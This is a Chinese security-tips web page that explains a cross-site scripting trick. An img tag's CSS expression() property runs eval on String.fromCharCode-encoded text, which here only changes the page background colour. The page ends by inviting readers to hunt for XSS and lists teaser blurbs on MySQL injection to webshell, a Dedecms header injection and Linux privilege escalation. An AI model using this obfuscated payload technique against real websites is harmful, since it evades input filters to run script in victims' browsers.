expression&eval跨站的一个方法
所属分类:
实用技巧 / 安全教程
阅读数:
553
收藏 0赞 0分享
expression这个CSS的属性很多程序都没有过滤好,很容易被跨,不知道用就参考剑心的幻影论坛跨站脚本漏洞测试过程.
我这里要说的是另外一种方法,使用String.fromCharCode方法把ASCⅡ码转换为字符再用EVAL函数执行.
<img src="https://cdn.zhanzhang360.cn/imgupload/006980/#" style="Xss:expression(eval(
String.fromCharCode(100,111,99,117,109,101,110,116,46,98,103,67,111,108,111,114,61,34,98,108,117,101,34)));">
嘿嘿,大把的XSS等你去挖掘,ENJOY IT :)
MySQL注入中导出字段内容的研究通过注入导出WebShell
大家都知道,在MySQL中,无法像MSSQL那样执行script.asp?id=1;insert into table (field) values('angel');--来插入数据,因为MySQL里最多就是用union联合查询。
收藏 0赞 0分享
Dedecms getip()的漏洞利用代码
flyh4t在非安全发布了dedecms getip()的注射漏洞,漏洞本身的成因没什么好说的老掉牙的X-Forwarded-For的问题,我想这个漏洞很多人都找到了,不过这个漏洞的利用有个地方还是可以说说的,可以直接得到shell:
收藏 0赞 0分享
非常不错的脚本入侵基础知识总结第1/2页
简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些 asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。
收藏 0赞 0分享
linux提权用的一个技巧
一个linux提权用的技巧,放出来全当找工作攒RP了。 OK,通常情况下,我们在执行bash脚本的时候,有一个执行过程,其中有一点比较重要:如果BASH_ENV被设置的话,它就会执行BASH_ENV指向的脚本
收藏 0赞 0分享
查看更多